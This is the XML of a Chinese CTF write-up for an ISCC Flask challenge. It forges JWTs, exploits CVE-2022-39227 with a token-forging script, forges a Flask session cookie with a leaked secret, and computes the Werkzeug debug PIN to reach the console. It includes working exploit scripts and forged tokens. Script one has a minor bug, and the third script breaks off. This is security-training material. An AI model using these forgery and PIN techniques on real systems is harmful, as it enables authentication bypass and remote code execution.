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DFA74" w14:textId="147F362B" w:rsidR="00AF064E" w:rsidRDefault="00280D8A" w:rsidP="00280D8A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Nebu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>韩磊</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00636EFA">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>1504895347@qq.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46C07560" w14:textId="14DDCC49" w:rsidR="00280D8A" w:rsidRDefault="00280D8A" w:rsidP="00280D8A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="461508DF" w14:textId="77777777" w:rsidR="00280D8A" w:rsidRDefault="00280D8A" w:rsidP="00280D8A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="222222"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>pin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>值计算</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76CDE5" w14:textId="1142ADDF" w:rsidR="00AF064E" w:rsidRPr="00280D8A" w:rsidRDefault="00AF064E" w:rsidP="00280D8A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="222222"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348D22F9" w14:textId="77777777" w:rsidR="00F17C5E" w:rsidRDefault="00280D8A" w:rsidP="00C7289F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进去后有提示，把提示base64解码后得到/getusername，访问路由后给了个回声海螺，输入</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>告诉我username是什么</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，返会pincalculate，说明username=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pincalculate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，输入app.py提示/crawler路由，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE7C6C5" w14:textId="77777777" w:rsidR="00F17C5E" w:rsidRDefault="00F17C5E" w:rsidP="00C7289F"/>
    <w:p w14:paraId="2355AC22" w14:textId="25837337" w:rsidR="00C7289F" w:rsidRDefault="00280D8A" w:rsidP="00C7289F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问/crawler路由，叫我们一秒钟以内算个算式，源代码里算式是从get_expression路由里获取的，可以写脚本计算并且发包，具体再脚本一。运行完脚本后获取</w:t>
      </w:r>
      <w:r w:rsidR="00C7289F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回显</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5480536E" w14:textId="52F53095" w:rsidR="00C7289F" w:rsidRDefault="00C7289F" w:rsidP="00C7289F">
      <w:r>
        <w:t>&lt;h1&gt;/usr/local/lib/python3.11/site-packages/flask/app.py&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6CA165" w14:textId="22A024D6" w:rsidR="00280D8A" w:rsidRDefault="00C7289F" w:rsidP="00C7289F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>&lt;h1&gt;uuidnode_mac位于/woddenfish&lt;/h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，说明app.py的路由=</w:t>
      </w:r>
      <w:r>
        <w:t>/usr/local/lib/python3.11/site-packages/flask/app.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC6C2DA" w14:textId="77777777" w:rsidR="00F17C5E" w:rsidRDefault="00F17C5E" w:rsidP="00C7289F"/>
    <w:p w14:paraId="67B1D9ED" w14:textId="4029AF0B" w:rsidR="00C7289F" w:rsidRDefault="00C7289F" w:rsidP="00C7289F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续访问/woddenfish路由，路由下有session非常可疑，可疑利用jwt伪造发包修改功德数，源码里有个字符串“</w:t>
      </w:r>
      <w:r>
        <w:t>ISCC_muyu_2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”可能是双向加密的密钥，记录下来，再通过jwt.io生成负数的</w:t>
      </w:r>
      <w:r w:rsidR="000365D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>quantity,最终payload:</w:t>
      </w:r>
      <w:r w:rsidR="000365D3" w:rsidRPr="000365D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000365D3" w:rsidRPr="000365D3">
        <w:t>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiZG9uYXRlIiwicXVhbnRpdHkiOi0xMDAwMH0.ZN5ynXCpelPPdzoCGBG2hgMKPt7THEQ3EQMH3jDAI5E</w:t>
      </w:r>
      <w:r w:rsidR="000365D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,用这个代替原本的json内容，发送后获得回显</w:t>
      </w:r>
      <w:r w:rsidR="000555F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000555F3">
        <w:t>"佛曰：功德圆满。地址02:42:ac:18:00:02:,机器码提示给你了/machine_id"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F71BF51" w14:textId="77777777" w:rsidR="000555F3" w:rsidRDefault="000555F3" w:rsidP="00C7289F"/>
    <w:p w14:paraId="5662B001" w14:textId="2554A505" w:rsidR="00AE199C" w:rsidRDefault="000555F3" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续访问/machine_id路由发现flask的session,解密后内容为{</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ro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ember</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>},那么思路就是获取密钥伪造session，这里需要用到</w:t>
      </w:r>
      <w:r w:rsidRPr="000555F3">
        <w:t>CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000555F3">
        <w:t>2022-39227</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,具体为网络上的脚本，对应下面为脚本二，</w:t>
      </w:r>
      <w:r w:rsidR="00AE199C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行脚本后得到payload:</w:t>
      </w:r>
      <w:r w:rsidR="00AE199C" w:rsidRPr="00AE199C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE199C" w:rsidRPr="00AE199C">
        <w:t>{" eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTQ1NTUwMjksImlhdCI6MTcxNDU1MTQyOSwianRpIjoiNVFFUklBdmtzSWlGanBDQkgyd3JQUSIsIm5iZiI6MTcxNDU1MTQyOSwicm9sZSI6InZpcCIsInVzZXJuYW1lIjoiSVNDQ21lbWJlciJ9.":"","protected":"eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9", "payload":"eyJleHAiOjE3MTQ1NTUwMjksImlhdCI6MTcxNDU1MTQyOSwianRpIjoiNVFFUklBdmtzSWlGanBDQkgyd3JQUSIsIm5iZiI6MTcxNDU1MTQyOSwicm9sZSI6Im1lbWJlciIsInVzZXJuYW1lIjoiSVNDQ21lbWJlciJ9","signature":"a8xnjhqvaTypdbMUj</w:t>
      </w:r>
      <w:r w:rsidR="00AE199C" w:rsidRPr="00AE199C">
        <w:lastRenderedPageBreak/>
        <w:t>dHMxusl08DYx4BL3VR50lSgT3O6i0x86oo0At9AsXQF7WAriE3jtknmjWoW2fcahZoUBPN_w4fnTshuMNjIEjeZHpu9pDDpXu7UaD3PUID3UupZDfmRzo9HIM-nC2iufdB20EvpzobxqfMGIafKUHr86XrRrH6Gq8EKKOggbJwCjZWjEwUrB_HIWfOkOW6Au77vlWyumg6QVOvykg_uwrfM6VTrGKA1yujbpmYvJ8wa5TWMpq2UqhfaTgFu35-k4jiue1VHOWv3BZHybtrg8k2fgI8_ShQGicxVheB8KMiF96_iU65gn54r_ygNaqz95aupvQ"}</w:t>
      </w:r>
      <w:r w:rsidR="00AE199C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将payload传给</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00AE199C" w:rsidRPr="00636EFA">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://101.200.138.180:10006/vipprice?token=</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FE93811" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:widowControl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得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>"welcome_to_iscc_club"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>，说明这个是密钥，直接伪造flask:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E149FF5" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE199C">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>python3 flask1.py encode -s welcome_to_iscc_club -t "{'role':'supervip'}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347F0BC4" w14:textId="642D3096" w:rsidR="000555F3" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:widowControl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最终伪造的payload:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE199C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE199C">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>eyJyb2xlIjoic3VwZXJ2aXAifQ.ZjH8cg.KyZ7SWW694ItL5k5AM9_E_Do7yI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346EEBE2" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRPr="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199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  <w:color w:val="000000"/>
        </w:rPr>
        <w:t>传进去得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE199C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>acff8a1c-6825-4b9b-b8e1-8983ce1a8b94</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3FCE06" w14:textId="729AD2C6" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C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直到现在，计算ping值的参数才全部集齐，跑脚本三获取pin</w:t>
      </w:r>
      <w:r w:rsidR="00804955">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADCBD08" w14:textId="77777777" w:rsidR="00804955" w:rsidRPr="00804955" w:rsidRDefault="00804955" w:rsidP="0080495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04955">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Md5Pin:  208-479-340</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DE3AA6" w14:textId="014CD020" w:rsidR="00804955" w:rsidRDefault="00804955" w:rsidP="0080495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04955">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sha1Pin:  252-749-991</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7292BC39" w14:textId="77777777" w:rsidR="00804955" w:rsidRDefault="00804955" w:rsidP="00804955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2EA3A6E1" w14:textId="25A2BB04" w:rsidR="00804955" w:rsidRPr="00AE199C" w:rsidRDefault="00804955" w:rsidP="00804955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访问/console路由输入pin即可得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2472E4E2" w14:textId="70912123" w:rsidR="00280D8A" w:rsidRPr="000555F3" w:rsidRDefault="00280D8A" w:rsidP="000555F3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EXP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50238D4E" w14:textId="65E2ED85" w:rsidR="00C7289F" w:rsidRDefault="00280D8A" w:rsidP="00280D8A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本一</w:t>
      </w:r>
      <w:r w:rsidR="000555F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15466F7E" w14:textId="77777777" w:rsidR="00C7289F" w:rsidRDefault="00280D8A" w:rsidP="00280D8A">
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB84E84" w14:textId="62C05EB4" w:rsidR="00280D8A" w:rsidRDefault="00C7289F" w:rsidP="00280D8A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>po={</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:None,</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:None}</w:t>
      </w:r>
      <w:r w:rsidR="00280D8A">
        <w:br/>
        <w:t>res = requests.get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00280D8A">
        <w:t>http://101.200.138.180:10006/get_expression</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,proxies=po</w:t>
      </w:r>
      <w:r w:rsidR="00280D8A">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00280D8A">
        <w:br/>
        <w:t>res</w:t>
      </w:r>
      <w:r w:rsidR="00280D8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00280D8A">
        <w:t> = requests.get(</w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00280D8A">
        <w:t>http://101.200.138.180:10006/crawler?answer={}</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00280D8A">
        <w:t>.format(eval(res.json()[</w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00280D8A">
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00280D8A">
        <w:t>].replace("÷","/").replace("×","*")))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,proxies=po</w:t>
      </w:r>
      <w:r w:rsidR="00280D8A">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00280D8A">
        <w:br/>
        <w:t>print(res</w:t>
      </w:r>
      <w:r w:rsidR="00280D8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00280D8A">
        <w:t>.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC88781" w14:textId="77777777" w:rsidR="00A57FB8" w:rsidRDefault="00A57FB8" w:rsidP="00280D8A"/>
    <w:p w14:paraId="70A96E48" w14:textId="0791C2B7" w:rsidR="000555F3" w:rsidRDefault="000555F3" w:rsidP="00280D8A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本二：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8B010C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>from json import loads, dumps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B40A77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>from jwcrypto.common import base64url_encode, base64url_decode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470260A8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4142D650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3C248744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>def topic(topic):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60660B20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 xml:space="preserve">    [header, payload, signature] = topic.split('.')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5B925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 xml:space="preserve">    parsed_payload = loads(base64url_decode(payload))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5C9735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 xml:space="preserve">    print(parsed_payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7421B321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 xml:space="preserve">    parsed_payload["role"] = "vip"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE1E1E3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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print(dumps(parsed_payload, separators=(',', ':')))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A3A6B2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 xml:space="preserve">    fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283EBD5A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 xml:space="preserve">    print(fake_payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2F280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 xml:space="preserve">    return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"} '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484DD2F2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6CA25B76" w14:textId="77777777" w:rsidR="000555F3" w:rsidRP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2B9BBDFF" w14:textId="77777777" w:rsidR="000555F3" w:rsidRDefault="000555F3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0555F3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>print(topic('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTQ1NDQ0MzgsImlhdCI6MTcxNDU0MDgzOCwianRpIjoiTzZ3VHhmR096cjdrQTRBemlnamE2QSIsIm5iZiI6MTcxNDU0MDgzOCwicm9sZSI6Im1lbWJlciIsInVzZXJuYW1lIjoiSVNDQ21lbWJlciJ9.hSUaV-X4mcdxaIglVPQ_RApAuNCFqSKHFyPzsnHsdtNSDlkCxAx9Hb4OXV7NcSNx6e2FGqveKTh86xWTC6nZPcTtk1BtjQJQ-YlxtCoHfiwNrzI6irlFtUAlekxIMrgJRFfNSrmbduq_eOiZp1L09F_dV1Rs1hyotM-1VIVk1HeBzTgSMFVCe-GFqO5g0iwvzDv8UTr0HiD3cYAP43BNdDWJFCNYQjssoAlyX4apamKToJpuQRNztnVqpgy5ZzMVHSL66DXR9EBDT-bgHiNOpm99n2yQKYKjnitSYmmnv_FPp8WFTBm9H_Q0LAUUcLGOv3YqgJ_FyWDhwIVpFQF5wQ'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2663EAA1" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C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14:paraId="7118885C" w14:textId="3A905EC7" w:rsidR="00AE199C" w:rsidRDefault="00AE199C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脚本三：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CB9D3F" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C2411" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>from itertools import chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E0AA80" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>import argparse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF9A087" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C904570" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>def getMd5Pin(probably_public_bits, private_bits):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C4D730" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    h = hashlib.md5()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B80563C" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for bit in chain(probably_public_bits, private_bits):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2578F0C6" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if not bit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB99F84" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B295EA7" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if isinstance(bit, str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D20DC06" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            bit = bit.encode('utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A5A43B" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        h.update(bit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9A1AF0" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    h.update(b'cookiesalt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C08492C" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74EBF639" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    num = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B51CF5D" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if num is None:</w:t>
      </w:r>
    </w:p>
